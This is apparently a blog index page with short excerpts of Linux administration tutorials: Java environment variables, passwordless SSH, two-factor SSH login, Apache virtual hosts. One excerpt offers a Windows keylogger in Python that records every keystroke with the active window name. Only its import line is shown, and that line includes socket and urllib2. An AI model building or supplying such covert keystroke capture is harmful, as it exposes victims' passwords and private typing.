Steps to set JAVA enviroment variable on Amazon Linux in 4 simple steps. (Updated 14th Jan 2020) Step 1: Check & install correct JAVA version (Optional) Check if JAVA exists on your device by running : …
Blog Posts
Steps to Enabling Password-Less SSH login : First of all install SSH server and agent respectively STEP 1 : Generate a authentication keys for User A: $ssh-keygen -t rsa STEP 2: Change the permissions of .ssh to 700 …
A keylogger which will capture all the keyboard activity and associate it with the current active window running by record all of this in a text file. Its a demo code. I’m also sharing screen shots …
You’ll need three libraries py2exe,pyhook,pywin32 to be installed on the host in order to run this code. keylogger.py --------------------------------------------------------- from threading import Timer from threading import Thread import subprocess, socket, base64, time, datetime, os, sys, urllib2, …
Basically its necessary to know what all user are doing or did on your system which can help us in hardening the system. To view commands which were executed by a specific user : ~$ …
Host System Requirements: Note :Ubuntu is not compliant out of the box, copy-paste the script and run it: you might need to install some packages which are not present in ubuntu 14.04 bhargav@Inspiron:~$sudo apt-get install texinfo …
Step One – Install Dependencies $sudo apt-get install libpam-google-authenticator Step Two – Edit the Configuration Files To use the module you have to edit two configuration files. $nano /etc/pam.d/sshd Add the following line on top of …
Install apache webserver : $ sudo apt-get install apache2 Install php5: $ sudo apt-get install php5-gd Install mysql server: $ sudo apt-get install mysql-server Create a virtual host file ‘localtimetrack.com’ : $ sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/localtimetrack.com.conf …
First install apache2 webserver firing following command on your terminal: sudo apt-get install apache2 Step 1 : Create a “.conf ” file in sites-available. cd /etc/apache2/sites-available $nano test.mydomaine.com.conf Step 2 : Insert following content in test.mydomaine.com …
Social Profiles